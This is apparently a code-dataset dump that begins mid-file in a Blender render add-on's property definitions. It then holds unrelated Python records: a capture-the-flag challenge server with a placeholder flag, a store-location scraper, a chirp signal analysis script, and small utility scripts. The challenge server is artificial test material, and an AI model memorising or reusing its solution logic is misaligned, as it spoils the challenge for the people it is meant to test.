Suffix',\n    )\n\n    name_suffix_02 = EnumProperty(\n        items= suffix_options,\n        name='Second Suffix',\n    )\n\n    name_suffix_03 = EnumProperty(\n        items= suffix_options,\n        name='Third Suffix',\n    )\n\n\n    # Subdirectories\n    # --------------------------------------------------------------------------\n    subdirs_scene = BoolProperty(\n        name='Scenes',\n        description='Make a subdir for each scene',\n        default=False,\n    )\n\n    subdirs_cam = BoolProperty(\n        name='Cameras',\n        description='Make a subdir for each camera',\n        default=False,\n    )\n    \n    subdirs_layer = BoolProperty(\n        name='Render Layers',\n        description='Make a subdir for each render layer',\n        default=False,\n    )\n\n\nclass RP_Batch_Ops_QuickBatch(bpy.types.PropertyGroup):\n\n    \"\"\" Data for Quick Batch \"\"\"\n    \n    tiles_x = IntProperty( \n        name='Horizontal Tiles',\n        min=1,\n        max=10,\n        default=2,\n    )\n\n    tiles_y = IntProperty( \n        name='Vertical Tiles',\n        min=1,\n        max=10,\n        default=2,\n    )\n\n    output_path = StringProperty(\n        name='Output path',\n        default='', \n        subtype='FILE_PATH'\n    )\n    \n    size_x = IntProperty( \n        name='Width',\n        min=1,\n        max=10000,\n        default=1,\n        subtype='PIXEL',\n    )\n    \n    size_y = IntProperty( \n        name='Height',\n        min=1,\n        max=100000,\n        default=1,\n        subtype='PIXEL',\n    )\n    \n    scene = StringProperty(default=\"\", name=\"Scene\")\n    \n    all_scenes = BoolProperty(default=False, name=\"Use all scenes\")\n    \n    use_animation = BoolProperty( \n        name='Animation',\n        default=True, \n        description='Make animation render jobs',\n    )\n    \n    no_camera = BoolProperty( \n        name='Don\'t use cameras',\n        default=False, \n        description='Don\'t set up cameras for render jobs',\n    )\n    \n    \n    \nclass RP_Batch_Ops(bpy.types.PropertyGroup):\n    \"\"\" Settings for operators \"\"\"\n    \n    output_change = PointerProperty(type=RP_Batch_Ops_OutputChange)\n    quick_batch = PointerProperty(type=RP_Batch_Ops_QuickBatch)\n    \n    \n# ------------------------------------------------------------------------------\n# RENDER JOB\n# ------------------------------------------------------------------------------\n\n# ------------------------------------------------------------------------------\n# HELPER FUNCTIONS\n\n\ndef check_job_name(name):\n    \"\"\" Make sure the job name is unique \"\"\"\n\n    def check_duplicate(i, name_to_check):\n        \"\"\" check new names recursively \"\"\"\n        \n        if name_to_check not in seen:\n            return name_to_check\n        else:\n            i += 1\n            correct_name = '{0}.{1:0>3}'.format(name, i) \n            return check_duplicate(i, correct_name)\n\n    # 
-------------------------------------------------------------------------- \n batch = bpy.context.scene.renderplus.batch.jobs\n seen = set()\n i = 0\n \n for job in batch:\n if job.name not in seen:\n seen.add(job.name)\n \n return check_duplicate(i, name)\n\n\ndef set_job_name(self, value):\n \"\"\" Wrapper to call check_job_name \"\"\"\n\n if 'name' in self and self['name'] == value:\n return\n\n self['name'] = check_job_name(value)\n\n\ndef get_job_name(self):\n \"\"\" Get the job's name \"\"\"\n\n # Sometimes draw() calls this, before it's defined\n if 'name' in self:\n return self['name']\n else:\n return 'Untitled Render Job'\n\n\ndef default_job_name():\n \"\"\" Return the default name for a job \"\"\"\n\n return check_job_name('New Render Job')\n\n\ndef fill_job_from_scene(self, context):\n \"\"\" Populate all fields for render job from scene data \"\"\"\n \n batch_list = bpy.context.scene.renderplus.batch.jobs\n index = bpy.context.scene.renderplus.batch.index\n \n if batch_list[index].use_external:\n return\n \n try:\n scene = bpy.data.scenes[batch_list[index].scene]\n except KeyError:\n return\n \n try:\n batch_list[index].camera = scene.camera.name\n except AttributeError:\n pass\n \n try:\n batch_list[index].world = scene.world.name\n except AttributeError:\n pass\n \n batch_list[index].layer = scene.render.layers[0].name\n \n \ndef set_external(self, context):\n \n batch_list = bpy.context.scene.renderplus.batch.jobs\n index = bpy.context.scene.renderplus.batch.index\n \n if batch_list[index].use_external:\n batch_list[index].scene = ''\n batch_list[index].camera = ''\n batch_list[index].world = ''\n batch_list[index].layer = ''\n else:\n batch_list[index].scene = context.scene.name\n \n \n\ndef is_batch_format_optional(format):\n \"\"\" Check if a file format is optional \"\"\"\n\n optional = (\n 'HDR',\n 'TIFF',\n 'EXR',\n 'MULTILAYER',\n 'MPEG',\n 'AVICODEC',\n 'QUICKTIME',\n 'CINEON',\n 'DPX',\n 'DDS')\n\n return (format in optional)\n\n\n\ndef generate_GPU_enum(self, context):\n \"\"\" Generate list of computing devices for ui \"\"\"\n \n items = [\n ('DEFAULT', 'Default', 'Don\\'t change computing device'),\n ('CPU', 'CPU', 'Render using the CPU')\n ]\n \n for i in range(prefs.batch_cuda_devices):\n items.append(('CUDA_' + str(i), \n 'GPU #' + str(i+1), \n 'Use this GPU to render'))\n \n return items\n\n# ------------------------------------------------------------------------------\n# CLASSES\n\n\nclass RP_CustomOverride(bpy.types.PropertyGroup):\n\n \"\"\" Custom overrides for a render job \"\"\"\n\n path = StringProperty(\n name='Datapath',\n description='Datapath to property',\n default='')\n\n data = StringProperty(\n name='Data',\n description='Data to use',\n default='')\n \n name = StringProperty(\n name='Name',\n description='Override Name',\n default='New Custom Override')\n \n enabled = BoolProperty(\n name='Enabled',\n description='Enable this override',\n default = True,)\n\n\nclass RP_RenderJob(bpy.types.PropertyGroup):\n\n \"\"\" Render job to put in queue \"\"\"\n\n # --------------------------------------------------------------------------\n # BASIC PROPS\n\n name = StringProperty(\n name='Name',\n description='A name to identify this job in the queue',\n default='Untitled Render Job',\n set=set_job_name,\n get=get_job_name)\n\n scene = StringProperty(\n name='Scene',\n description='Scene to render',\n default='',\n update=fill_job_from_scene)\n\n camera = StringProperty(\n name='Camera',\n description='Camera to use in this render',\n default='')\n\n 
world = StringProperty(\n name='World',\n description='World to use in this render',\n default='')\n\n layer = StringProperty(\n name='Render Layer',\n description='Use only this render layer',\n default='')\n\n enabled = BoolProperty(\n name='Enable this render job',\n description='Process this render job',\n default=True)\n\n # --------------------------------------------------------------------------\n # EXTERNAL BLEND\n # --------------------------------------------------------------------------\n\n use_external = BoolProperty(\n name='Use external blendfile',\n description='Use a external blend file for this job',\n default=False,\n update=set_external)\n\n blend_file = StringProperty(\n name='Blend File',\n description='Path to external blendfile',\n subtype='FILE_PATH',\n default='')\n\n # --------------------------------------------------------------------------\n # FRAMES AND ANIMATION\n # --------------------------------------------------------------------------\n\n animation = BoolProperty(\n name='Animation',\n description='Render an animation instead of a still image',\n default=False)\n\n frame_custom = BoolProperty(\n name='Custom Frame',\n description='Use a custom frame or frame range for this render',\n default=False)\n\n frame_still = IntProperty(\n name='Frame',\n description='Frame to render',\n default=0)\n\n frame_start = IntProperty(\n name='Start Frame',\n description='First frame of the animation range',\n default=0)\n\n frame_end = IntProperty(\n name='End Frame',\n description='Final frame of the animation range',\n default=250)\n\n # --------------------------------------------------------------------------\n # OUTPUT\n # --------------------------------------------------------------------------\n\n output = StringProperty(\n name='Output',\n description='Filename to output to',\n subtype='FILE_PATH',\n default='')\n\n use_custom_format = BoolProperty(\n name='Custom File Format',\n description='Use a specific file format for this render job',\n default=False,\n )\n\n format = EnumProperty(\n name='Format',\n description='Format to use in the render job',\n items=(('TGA', 'Targa', ''),\n ('IRIS', 'Iris', ''),\n ('JPEG', 'Jpeg', ''),\n ('MOVIE', 'Movie', ''),\n ('RAWTGA', 'Raw Targa', ''),\n ('AVIRAW', 'Raw AVI', ''),\n ('AVIJPEG', 'Jpeg AVI', ''),\n ('PNG', 'PNG', ''),\n ('BMP', 'BMP', ''),\n ('HDR', 'Radiance HDR', ''),\n ('TIFF', 'TIFF', ''),\n ('EXR', 'OpenEXR', ''),\n ('MULTILAYER', 'OpenEXR Multilayer', ''),\n ('MPEG', 'MPEG', ''),\n ('QUICKTIME', 'Quicktime', ''),\n ('CINEON', 'Cineon', ''),\n ('DPX', 'DPX', ''),\n ('DDS', 'DDS', ''),\n ),\n default='PNG',\n )\n \n cycles_samples = IntProperty(\n name='Samples',\n description=('Samples to render. 
Set to 0 to use'\n ' the value set in the scene'),\n default=0,\n min=0,\n max=10000)\n\n threads = IntProperty(\n name='Threads',\n description='Threads to use while rendering',\n default=0,\n min=0,\n max=64)\n\n # --------------------------------------------------------------------------\n # RENDER SIZE\n # --------------------------------------------------------------------------\n\n size_custom = BoolProperty(\n name='Custom Size',\n description='Use a custom render size for this job',\n default=False)\n\n size_x = IntProperty(\n name='Width',\n description='Custom render width for this job',\n default=1920,\n min=4)\n\n size_y = IntProperty(\n name='Height',\n description='Custom render height for this job',\n default=1080,\n min=4)\n\n\n use_section = BoolProperty(\n name='Render section',\n description = 'Render only a section of the image',\n default= False,)\n\n section_x = FloatProperty(\n name='X',\n description='Starting X coordinate for section render',\n default=0,\n min=0,\n max=0.99,)\n \n section_y = FloatProperty(\n name='Y',\n description='Starting Y coordinate for section render',\n default=0,\n min=0,\n max=0.99,)\n \n section_width = FloatProperty(\n name='Width',\n description='Width for section render',\n default=1,\n min=0.01,\n max=1,)\n \n section_height = FloatProperty(\n name='Height',\n description='Height for section render',\n default=1,\n min=0.01,\n max=1,)\n \n device = EnumProperty(\n name='Compute Device',\n description='Compute device to render with',\n items=generate_GPU_enum)\n\n # --------------------------------------------------------------------------\n # CUSTOM OVERIDES\n # --------------------------------------------------------------------------\n\n custom_overrides = CollectionProperty(type=RP_CustomOverride)\n \n custom_overrides_index = IntProperty(\n name='Index of current custom override',\n default=0)\n\n\n# ------------------------------------------------------------------------------\n# RENDER SLOTS\n# ------------------------------------------------------------------------------\n\nclass RP_RenderSlot(bpy.types.PropertyGroup):\n\n \"\"\" Customizable render slots \"\"\"\n\n identifier = IntProperty(\n name='ID',\n description='Int to identify this slot',\n default=0,\n min=0,\n max=8\n )\n\n name = StringProperty(\n name='Name',\n description='A name to identify this slot',\n default='Slot',\n )\n\n is_used = BoolProperty(\n name='Slot is used',\n description='True if this slot has been used for render',\n default=False)\n\n\n# ------------------------------------------------------------------------------\n# STATS\n# ------------------------------------------------------------------------------\nclass RP_StatsData(bpy.types.PropertyGroup):\n\n \"\"\" Stats data \"\"\"\n\n average = FloatProperty(\n name='Average frame rendertime',\n description='Averaged rendertime for all frames',\n default=0)\n\n slowest = FloatVectorProperty(\n name='Slowest frame rendertime',\n description='Highest rendertime for all frames',\n size=2,\n default=(0, 0))\n\n fastest = FloatVectorProperty(\n name='Fastest frame rendertime',\n description='Smallest rendertime of all frames',\n size=2,\n default=(0, 0))\n\n remaining = FloatProperty(\n name='Time remaining to complete animation',\n description='Estimation of how long rendering will take',\n default=0)\n\n total = FloatProperty(\n name='Total rendertime',\n description='Time it took to render the last animation',\n default=-1)\n\n ui_toggle = BoolProperty(\n name='Show time stats',\n description='Show 
more stats about render time',\n default=False)\n\n save_file = BoolProperty(\n name='Save stats to a file',\n description='Save the stats to a CSV file',\n default=False)\n\n\n# ------------------------------------------------------------------------------\n# BATCH\n# ------------------------------------------------------------------------------\nclass RP_BatchSettings(bpy.types.PropertyGroup):\n\n \"\"\" Batch Data \"\"\"\n\n jobs = CollectionProperty(type=RP_RenderJob)\n\n index = IntProperty(\n name='Index of current render job in list',\n default=0)\n\n # Batch Renders Settings -----------------------------\n rss_path = StringProperty(\n name='RSS file',\n description='Filepath to write batch RSS file to',\n default='//feed.rss',\n subtype='FILE_PATH'\n )\n\n use_rss = BoolProperty(\n name='Write RSS file',\n description='Generate a RSS file to monitor batch process',\n default=False)\n\n write_logs = BoolProperty(\n name='Write log files',\n description='Write log files for each render job',\n default=False)\n\n use_global_size = BoolProperty(\n name='Global size',\n description='Override size for all render jobs',\n default=False)\n\n global_size_x = IntProperty(\n name='Width',\n description='Custom render width for all jobs',\n default=1920,\n min=4)\n\n global_size_y = IntProperty(\n name='Height',\n description='Custom render height for all jobs',\n default=1080,\n min=4)\n\n use_global_percentage = BoolProperty(\n name='Global Percentage',\n description='Override size percentage for all jobs',\n default=True)\n\n global_percentage = FloatProperty(\n name='Percentage',\n description='Custom size percentage for all jobs',\n subtype='PERCENTAGE',\n precision=0,\n min=1,\n max=100,\n default=100)\n\n ignore_border = BoolProperty(\n name='Ignore render border',\n description='Ignore render border for batch',\n default=False)\n \n use_term = BoolProperty( \n name='Use terminal',\n description='Run the batch inside a terminal',\n default=False,)\n\n use_rplus_settings = BoolProperty( \n name='Use Render+ Settings',\n description='Use notification, poweroff and post/pre actions in batch',\n default=False,)\n\n # Batch Renders UI \n # --------------------------------------------------------------------------\n ui_job_tab = EnumProperty(\n name='Tab for render job overrides',\n description='Current tab for render job overrides',\n items=(('SCENE', 'Scene', 'Scene related overrides'),\n ('RENDER', 'Render', 'Rendering related overrides'),\n ('CUSTOM', 'Custom', 'Custom Overrides')),\n default='SCENE')\n\n\n# ------------------------------------------------------------------------------\n# ACTION\n# ------------------------------------------------------------------------------\n\nclass RP_ActionSettings(bpy.types.PropertyGroup):\n\n \"\"\" Settings for pre/post actions \"\"\"\n\n option = EnumProperty(\n name='Option',\n description='Options to run this action',\n items=(('command', 'Command', 'Run a command'),\n ('script', 'Script', 'Run a Python script')),\n default='command')\n\n command = StringProperty(\n name='Command',\n description='Command to execute',\n default='')\n\n script = StringProperty(\n name='Script',\n description='Script to run',\n default='')\n\n\n# ------------------------------------------------------------------------------\n# SETTINGS\n# ------------------------------------------------------------------------------\n\n\nclass RP_Settings(bpy.types.PropertyGroup):\n\n \"\"\" Settings and UI States for R+ \"\"\"\n\n off_options = EnumProperty(\n name='Power Off',\n 
description='Power off when rendering is finished',\n        items=(('DISABLED', 'Disabled', 'Leave the computer on'),\n               ('SLEEP', 'Sleep', 'Set computer to sleep'),\n               ('OFF', 'Shut down', 'Turn off computer')),\n        default='DISABLED')\n\n\n    notifications_desktop = BoolProperty(\n        name='Desktop Notifications',\n        description='Notify me using the Desktop',\n        default=False)\n\n    notifications_sound = BoolProperty(\n        name='Sound',\n        description='Notify me using Sound',\n        default=False)\n\n    notifications_mail = BoolProperty(\n        name='Email',\n        description='Send an email to notify me',\n        default=False)\n\n    opengl_transparent = BoolProperty(\n        name='Transparent',\n        description='Make background transparent',\n        default=False)\n    \n    opengl_use_viewport = BoolProperty(\n        name='Render Viewport',\n        description='Render the entire viewport (including invisible objects)',\n        default=False)\n    \n    opengl_percentage = FloatProperty(\n        name='Size Percentage',\n        description='Custom size percentage for OpenGL renders',\n        subtype='PERCENTAGE',\n        precision=0,\n        min=1,\n        max=100,\n        default=100)\n    \n    autosave = BoolProperty(\n        name='Autosave image renders',\n        description=('Save image renders automatically to the folder in the'\n                     ' output panel'),\n        default=False)\n\n    stats = PointerProperty(type=RP_StatsData)\n\n    batch = PointerProperty(type=RP_BatchSettings)\n    \n    batch_ops = PointerProperty(type=RP_Batch_Ops)\n\n    # Render Slots \n    # --------------------------------------------------------------------------\n    slots = CollectionProperty(type=RP_RenderSlot)\n\n    active_slot = IntProperty(\n        name='Index of active slot',\n        default=0,\n        min=0,\n        max=8)\n\n    # Post-render settings \n    # --------------------------------------------------------------------------\n    post_enabled = BoolProperty(\n        name='Post Render Toggle',\n        description='Enable/Disable post render actions',\n        default=False)\n\n    post_settings = PointerProperty(type=RP_ActionSettings)\n\n    # Pre-render settings \n    # --------------------------------------------------------------------------\n    pre_enabled = BoolProperty(\n        name='Pre Render Toggle',\n        description='Enable/Disable Pre render actions',\n        default=False)\n\n    pre_settings = PointerProperty(type=RP_ActionSettings)\n","sub_path":"All_In_One/addons/renderplus/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":32589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"499950039","text":"from bs4 import BeautifulSoup\nfrom gevent.pywsgi import WSGIServer\nfrom flask import Flask, request, send_from_directory\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\nimport requests\n\nflag = 'ctf{00000000000000000000000000000000}'\n\napp = Flask(__name__)\n\nlimiter = Limiter(\n\tapp,\n\tkey_func=get_remote_address,\n)\n\n# please test this locally so this challenge doesn't get cloudflare'd\n@app.route('/whoami', methods=['POST'])\n@limiter.limit('5 per minute') \ndef whoami():\n\ttoken = request.form.get('token', None)\n\tif token is None or not 1 < len(token) < 60:\n\t\tprint(\"bad\", token)\n\t\treturn 'invalid token'\n\n\ttoken = request.form['token']\n\tres = requests.get('https://dmoj.ca/user', headers={\n\t\t'Authorization': 'Bearer ' + token\n\t})\n\n\tif not res.ok:\n\t\tprint(\"wrong\", token)\n\t\treturn 'invalid token'\n\n\tdom = BeautifulSoup(res.text, features='html.parser')\n\tuser = dom.select_one('#user-links b')\n\n\tif user is None:\n\t\tprint(\"no user\", token)\n\t\treturn 'invalid token'\n\n\tif user.text == 
'flag': # https://dmoj.ca/user/flag\n\t\treturn flag\n\n\treturn user.text\n\n\n@app.route('/')\ndef index():\n\treturn send_from_directory('', 'index.html')\n\nWSGIServer(('0.0.0.0', 5001), app).serve_forever()","sub_path":"DMOJCTF/2021/web/whoami/75fc429d78629963b3bea4a8dc6823a45ba39cc8.whoami/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"509421751","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests, json\r\nimport openpyxl\r\n\r\nmy_path = \"C:/Python/Documents/KFC_Indonesia.xlsx\"\r\nwb_obj_w = openpyxl.load_workbook(my_path)\r\nsheet_obj_w = wb_obj_w.active\r\n\r\n\r\nclass OBJ:\r\n    Title = \"\"\r\n    Address = \"\"\r\n    FullAddress = \"\"\r\n    Suburb = \"\"\r\n    State = \"\"\r\n    City = \"\"\r\n    Country = \"\"\r\n    Postcode = \"\"\r\n    Latitude = \"\"\r\n    Longitude = \"\"\r\n\r\nlistOBJ = []\r\nobj = OBJ()\r\nlistOBJ.append(obj)\r\n\r\nfor i in range(1, 123+1):\r\n    print(i)\r\n    # URL = 'https://agents.helloworld.com.au/search-location/' + str(postcode_sheet_obj.cell(row=i, column=1).value)\r\n    URL = 'https://kfcku.com/api/stores?page='+str(i)\r\n    res = requests.get(URL)\r\n    # res = requests.get(URL)\r\n    # print(res.text)\r\n    if res.status_code == 200:\r\n        output = res.json()  # parse the JSON body; res.text is a plain string and output['data'] below would fail\r\n        print(output)\r\n\r\n        if len(output['data']) > 0:\r\n            for store in output['data']:\r\n\r\n                try:\r\n\r\n                    obj = OBJ()\r\n                    # print(store['ContactInfo']['FullAddress'])\r\n                    obj.Title = str(store['name'])\r\n                    obj.Address = str(store['address'])\r\n                    # map the API's 'lat'/'long' fields to the matching attributes\r\n                    obj.Latitude = str(store['lat'])\r\n                    obj.Longitude = str(store['long'])\r\n\r\n                    print(obj.Title + \"|\" + str(obj.Latitude) + \" | \" + str(\r\n                        obj.Longitude))\r\n\r\n                    result = False\r\n\r\n                    if len(listOBJ) > 0:\r\n                        for k in range(len(listOBJ)):  # use k so the page counter i is not shadowed\r\n                            # print(str(obj.Title) + \" \" + str(listOBJ[k].Title))\r\n                            if (str(\r\n                                    obj.Latitude) == str(listOBJ[k].Latitude) and str(obj.Longitude) == str(\r\n                                listOBJ[k].Longitude)):\r\n                                result = True\r\n                                break\r\n\r\n                    if result == False:\r\n                        listOBJ.append(obj)\r\n                except:\r\n                    continue\r\n\r\nj=0\r\nprint(len(listOBJ))\r\nfor z in range(len(listOBJ)):\r\n    j = j + 1\r\n    print(listOBJ[z].Title +\" \"+ str(listOBJ[z].Latitude) +\" \"+ str(listOBJ[z].Longitude))\r\n    sheet_obj_w.cell(row = j, column = 1).value = str(listOBJ[z].Title)\r\n    sheet_obj_w.cell(row = j, column = 2).value = str(listOBJ[z].Address)\r\n    # sheet_obj_w.cell(row = j, column = 3).value = str(listOBJ[z].Suburb)\r\n    # sheet_obj_w.cell(row = j, column = 4).value = str(listOBJ[z].State)\r\n    # sheet_obj_w.cell(row = j, column = 5).value = str(listOBJ[z].Country)\r\n    # sheet_obj_w.cell(row = j, column = 6).value = str(listOBJ[z].Postcode)\r\n    sheet_obj_w.cell(row = j, column = 7).value = str(str(listOBJ[z].Latitude))\r\n    sheet_obj_w.cell(row = j, column = 8).value = str(str(listOBJ[z].Longitude))\r\n    # wb_obj_w.save(\"C:/Python/Documents/KFC_Indonesia.xlsx\")\r\n","sub_path":"KFC (Indonesia).py","file_name":"KFC (Indonesia).py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"325842165","text":"from scipy.signal import chirp, sweep_poly, spectrogram, welch\nfrom scipy.special import factorial\nimport scipy.signal as signal\nimport numpy as np\nimport random\n\nimport rftool.radar as radar\nimport rftool.utility as util\nimport rftool.estimation as estimate\nimport rftool.communications as comm\nfrom utility import *\n\nimport matplotlib.pyplot 
as plt\nimport matplotlib as mpl\n\nimport pickle\n#import os\n\nDebug = False\n\nFs = np.intc(802e3) # Receiver sample rate. #! Must be the same as the signals\nT = np.float(6e-3) # Pulse duration. #! Must be the same as the signals\nnIterations = 500\npacketSize = 32\n\n# Load alpha window function a-priori\npath = '../jobs/'\nfilename = 'SCD_GMM'\ndestination = path + filename + '.pkl'\nwith open(destination,'rb') as f:\n alphaWindow = pickle.load(f)\n\n# Plot results\nimport matplotlib.pyplot as plt\nplt.style.use('masterThesis')\nimport matplotlib\nimagePath = '../figures/symRateEst/'\n\nif Debug==False:\n mpl.use(\"pgf\")\n mpl.rcParams.update({\n \"pgf.texsystem\": \"lualatex\",\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n })\n\n\n# Compare the method of \ndef symbolrateAutocorr(sig, Fs, **kwargs):\n Rxx = np.abs(signal.correlate(sig, sig, mode='full', method='fft'))\n f0 = estimate.f0MleTime(Rxx=Rxx, f=Fs, peaks=5)\n return f0\n\n# Wrapper for estimation function \ndef symbolRateEstimator(sig, Fs, aPrioriFCenter=False, **kwargs):\n # Ensure that the true center frequency is only used in the intended case\n if aPrioriFCenter==False:\n kwargs.pop('fCenterPriori') # removes fCenterPriori from kwargs library\n\n SCD, f, alpha = estimate.FAM(sig, Fs = Fs, plot=False, method='conj', scale='linear', **kwargs)\n fCenter, R_symb = estimate.cyclicEstimator( SCD, f, alpha, **kwargs)\n return R_symb\n\n# Configure estimators\nestimators = []\nestimators.append(estimator('Autocorrelation MLE', symbolrateAutocorr, Fs=Fs))\nestimators.append(estimator('Cyclic MLE Method', symbolRateEstimator, Fs=Fs))\nestimators.append(estimator('Cyclic MLE Method, Full BW', symbolRateEstimator, Fs=Fs, bandLimited=False))\nestimators.append(estimator('Cyclic MLE A-Priori $f_c$', symbolRateEstimator, aPrioriFCenter=True, Fs=Fs))\nestimators.append(estimator('Cyclic MLE A-Priori $f_c$, $\\Omega$', symbolRateEstimator, aPrioriFCenter=True, Fs=Fs, alphaWindow=alphaWindow, fWindow='triangle', fWindowWidthHertz=50e3))\n\n# Create analysis object\nm_analysis = analysis('Symbol_Rate_Estimation', estimators=estimators, lossFcn='MAE')\n\n# Generate Eb/N0 range for statistics gathering.\nEbN0Start = 40\nEbN0End = 10\n\nm_analysis.axis.displayName = '$E_b/N_0$ [dB]'\nm_analysis.axis.displayVector = np.linspace(EbN0End, EbN0Start, EbN0Start-EbN0End+1)\nm_analysis.axis.name = 'S/N [dB]'\nm_analysis.axis.vector = comm.EbN0toSNRdB(m_analysis.axis.displayVector, 2, Fs, 1/T)\nm_analysis.analyze(iterations=nIterations, parameter='symbolRate', packetSize=packetSize, debug=Debug)\n\n# Write to binary file\npath = '../jobs/'\njobname = 'SRateJob'\ndestination = path + jobname + str(m_analysis.iterations) + '.pkl'\n# Save job to binary file\nwith open(destination,'wb') as f:\n pickle.dump(m_analysis, f)\n\niterations = nIterations #! 
Must be same as job file\n\"\"\"\n# Read from binary file\npath = '../jobs/'\njobname = 'SRateJob'\ndestination = path + jobname + str(iterations) + '.pkl'\nwith open(destination,'rb') as f:\n m_analysis = pickle.load(f)\"\"\"\n\nfig, ax = m_analysis.plotResults(pgf=not Debug, scale='semilogy', plotYlabel='MAE [Hz]')\nax.legend(loc='upper right')\n#fig.set_figheight(2.5)\nplt.tight_layout()\n\n\nif Debug == False:\n fileName = m_analysis.name +'_'+ str(iterations) + '_iterations' # str(m_analysis.iterations)\n plt.savefig(imagePath + fileName + '.png', bbox_inches='tight')\n plt.savefig(imagePath + fileName + '.pgf', bbox_inches='tight')\n\nplt.show()","sub_path":"ChirpAnalyzer/multiAnlayzeSymbolRate.py","file_name":"multiAnlayzeSymbolRate.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"246245616","text":"from classes.recruit_classes import *\nfrom classes.note_class import Note\n\n\nclass MagicView:\n def __init__(self):\n self.recruitable_talent = [Cadre()]\n self.recruitable_erelyk = [Cadre()]\n\n self.talent_cadres = [Cadre()]\n self.erelyk_cadres = [Cadre()]\n\n self.notes = [Note()]\n\n def encode(self):\n result = dict(self.__dict__)\n\n result['recruitable_talent'] = [cadre.encode() for cadre in self.recruitable_talent]\n result['recruitable_erelyk'] = [cadre.encode() for cadre in self.recruitable_erelyk]\n result['talent_cadres'] = [cadre.encode() for cadre in self.talent_cadres]\n result['erelyk_cadres'] = [cadre.encode() for cadre in self.erelyk_cadres]\n result['notes'] = [note.encode() for note in self.notes]\n\n\n return result\n\n def decode(self, code):\n self.__dict__ = dict(code)\n self.recruitable_talent = [Cadre().decode(cadre) for cadre in code['recruitable_talent']]\n self.recruitable_erelyk = [Cadre().decode(cadre) for cadre in code['recruitable_erelyk']]\n self.talent_cadres = [Cadre().decode(cadre) for cadre in code['talent_cadres']]\n self.erelyk_cadres = [Cadre().decode(cadre) for cadre in code['erelyk_cadres']]\n self.notes = [Note().decode(note) for note in code['notes']]\n\n return self\n\nclass Cadre(Recruit):\n def __init__(self):\n super(Cadre, self).__init__()\n self.level = 0\n self.art = \"None\" # Maybe enum ?\n\n def encode(self):\n return super(Cadre, self).encode()\n\n def decode(self, code):\n return super(Cadre, self).decode(code)\n","sub_path":"classes/magic_classes.py","file_name":"magic_classes.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"614275858","text":"from tkinter import filedialog\nfrom helpers import read_edf,save_pdf,read_wav,save_wav\nimport threading\nimport re\n\nclass File_Explorer():\n \"\"\"\n Show the native file dialog for opening and saving files.\n \"\"\"\n @staticmethod\n def save_file(root):\n \"\"\"\n Save a PDF file on another thread.\n \"\"\"\n filename = filedialog.asksaveasfilename(initialdir = \"/\",\n title = \"Save a File\",\n defaultextension=\"*.pdf\",\n filetypes = ((\"PDF files\",\n \"*.pdf\"),\n (\"WAV files\",\n \"*.wav\"),\n (\"all files\",\n \"*.*\"))) or \"\"\n if re.search(\".wav\\Z\",filename) is not None:\n threading.Thread(target=save_wav,args=(filename,root.signal[\"Fs\"],root.signal[\"samples\"])).run()\n elif re.search(\".pdf\\Z\",filename) is not None:\n threading.Thread(target=save_pdf,args=(filename,root.viewers[1].signal,root.viewers[1].time,root.viewers[1].equalized_samples)).run()\n else:\n 
return None\n\n\n    @staticmethod\n    def open_file(root):\n        \"\"\"\n        Read data from EDF file and generate a Fileupload event.\n        \"\"\"\n        filename = filedialog.askopenfilename(initialdir = \"/\",\n                                          title = \"Select a File\",\n                                          filetypes = ((\"EDF files\",\n                                                        \"*.edf*\"),\n                                                        (\"WAV files\",\n                                                        \"*.wav\"),\n                                                        (\"all files\",\n                                                        \"*.*\"))) or \"\"\n        \n        if re.search(\".wav\\\\Z\",filename) is not None:\n            root.new_signal = read_wav(filename)\n            root.event_generate(\"<<Fileupload>>\")\n        elif re.search(\".edf\\\\Z\",filename) is not None:\n            root.new_signal = read_edf(filename)\n            root.event_generate(\"<<Fileupload>>\")\n        else:\n            return None","sub_path":"file_explorer.py","file_name":"file_explorer.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"464235679","text":"#!/usr/bin/python3\n\nimport sys\nfrom launchpadlib.launchpad import Launchpad\n\n\"\"\"\nPPAOWNER = sys.argv[1]\nPPA = sys.argv[2]\nversion = sys.argv[3]\narch = sys.argv[4]\n\"\"\"\n# version = \"xenial\"\n# arch = \"amd64\"\n# \"Pending\", \"Published\", \"Superseded\", \"Deleted\", \"Obsolete\"\n# status = 'Superseded'\n# status = \"Published\"\n# desired_dist_and_arch = 'https://api.launchpad.net/beta/ubuntu/' + version + '/' + arch\nsince = '2018-09-01'\nif len(sys.argv) > 1:\n    since = sys.argv[1]\n\n\ndef produce(PPAOWNER, PPA):\n    cachedir = \"~/.launchpadlib/cache/\"\n    lp_ = Launchpad.login_anonymously('ppastats', 'production', cachedir)\n    owner = lp_.people[PPAOWNER]\n    for ppa in PPA:\n        archive = owner.getPPAByName(name=ppa)\n        for individualarchive in archive.getPublishedBinaries(created_since_date=since, ordered=False):\n            # Optional filters\n            # status=status\n            # , distro_arch_series=desired_dist_and_arch\n            # print individualarchive\n            # if individualarchive.binary_package_name == 'kicad':\n            downloads = individualarchive.getDailyDownloadTotals()\n            for dt in downloads:\n                # print dt\n                # getDailyDownloadTotals())#getDownloadCount())\n                short_version = individualarchive.binary_package_version\n                short_version = short_version.split(\"+\")[0]\n                short_version = short_version.split(\"-\")[0]\n\n                print('\"' + PPAOWNER+\"/\"+ppa + '\",\"' + dt + '\",\"' + str(individualarchive.date_published) + '\",\"' + str(individualarchive.status) + '\",\"' + individualarchive.distro_arch_series.architecture_tag +\n                      '\",\"' + individualarchive.distro_arch_series.distroseries.name + '\",\"' + individualarchive.binary_package_name + '\",\"' + individualarchive.binary_package_version + '\",' + str(downloads[dt]) + ',\"'+short_version+'\"')\n#                print 